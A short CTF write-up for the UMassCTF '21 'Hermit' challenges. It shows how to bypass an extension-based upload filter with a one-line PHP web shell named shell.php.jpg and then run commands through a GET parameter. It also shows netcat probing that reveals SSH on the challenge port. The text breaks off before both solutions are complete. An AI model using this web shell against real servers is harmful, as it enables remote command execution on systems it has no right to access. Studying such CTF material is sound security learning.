Hacking

UMassCTF '21 Hermit 1 WriteUp

hermit logo

Solution

There is only one form that accepts a file.

The validation of the file is based on extension so we can try and upload shell.php.jpg image with content like this:

<?=`$_GET[0]`?>

When image is uploaded we see the page like this:

hermit logo

Click on See image and we see a blank page with some strange PHP errors. It’s because our “image” expects get param called “0” so let’s add one.

UMassCTF '21 Hermit 2 WriteUp

hermit logo

Solution

The image above is what we see when visiting the challenge URL (104.197.195.221:8087)

That’s strange. Initially I thought the site is down but it’s fine.

Let’s try to connect with NetCat and see what the server tell us and why browser can’t display it.

nc -vvv 104.197.195.221 8087

and response we get back is:

221.195.197.104.bc.googleusercontent.com [104.197.195.221] 8087 (?) open
SSH-2.0-OpenSSH_7.9p1 Debian-10+deb10u2

Doesn’t look like valid HTTP resopnse lol. Ok now we know that SSH server is running on that port so let’s try to connect.